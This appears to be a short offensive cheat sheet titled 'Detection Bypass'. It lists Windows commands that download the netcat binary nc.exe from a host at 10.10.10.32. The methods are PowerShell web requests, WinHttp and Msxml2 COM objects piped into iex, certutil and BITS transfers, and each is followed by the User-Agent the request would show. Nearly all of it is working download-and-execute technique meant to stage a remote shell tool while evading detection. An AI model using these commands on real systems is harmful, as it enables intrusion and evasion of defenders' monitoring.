Detection Bypass

PS C:\sam> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe" 
PS C:\sam> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

PS C:\sam> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\sam> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\sam> $h.send();
PS C:\sam> iex $h.ResponseText

GET /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

PS C:\sam> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\sam> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\sam> $h.send();
PS C:\sam> iex $h.responseText

GET /nc.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

C:\sam> certutil -urlcache -split -f http://10.10.10.32/nc.exe 
C:\sam> certutil -verifyctl -split -f http://10.10.10.32/nc.exe

GET /nc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0

PS C:\sam> Import-Module bitstransfer;
PS C:\sam> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
PS C:\sam> $r=gc $env:temp\t;
PS C:\sam> rm $env:temp\t; 
PS C:\sam> iex $r

HEAD /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8